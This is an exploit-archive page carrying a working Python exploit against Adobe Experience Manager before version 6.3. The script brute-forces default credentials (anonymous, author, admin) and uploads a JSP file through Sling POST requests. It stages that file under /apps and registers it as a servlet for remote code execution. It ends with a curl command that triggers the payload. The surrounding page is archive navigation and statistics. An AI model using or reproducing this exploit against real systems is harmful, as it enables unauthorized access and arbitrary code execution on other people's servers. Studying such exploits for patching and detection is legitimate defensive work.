Adobe Experience Manager (AEM) Remote Code Execution

Adobe Experience Manager (AEM) Remote Code Execution: Posted May 20, 2018; Authored by StaticFlow; Default credentials in Adobe Experience Manager (AEM) versions prior to 6.3 can lead to remote code execution.; tags | exploit, remote, code execution; SHA-256 | bb68169b4ed36407d54db33f7cdfed0f3ade75d95789e74c0c54cb1b44fcd9ff; Download | Favorite | View

Adobe Experience Manager (AEM) Remote Code Execution

# Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
# Date: 5/19/18
# Exploit Author: StaticFlow
# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html
# Version: < 6.3
import requests
import sys
 
baseUrl = 'https://test.com/' #default domain, change here or pass in on command line
credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']]
exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line
 
def testLogins():
    for credential in credentialList:
        response = requests.get(baseUrl, auth=(credential[0], credential[1]))
        if(response.status_code == 200):
            return credential
    return False
 
if len(sys.argv) == 2:
    baseUrl = sys.argv[1]
if len(sys.argv) == 3:
    exploit = sys.argv[2]
 
gotCreds = testLogins()
if(gotCreds):
    attackChain = [
        {
            'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit
        },
        {
            'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit
        },
        {
            ':operation': (None, 'copy'), #copy exploit folder over to app folder for staging
            ':dest': (None, '/apps/rcetype')
        },
        {
            'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet
        }
    ]
    print "creating folder structure and uploading exploit"
    for attack in attackChain[:-1]:
        response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1]))
        if response.status_code > 201:
            print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
            print response.content
            sys.exit(0)
 
    print "initializing servlet from exploit"
    response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1]))
    if response.status_code > 201:
        print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
        print response.content
        sys.exit(0)
    print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec')

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Adobe Experience Manager (AEM) Remote Code Execution

Adobe Experience Manager (AEM) Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Adobe Experience Manager (AEM) Remote Code Execution

Share This

Adobe Experience Manager (AEM) Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems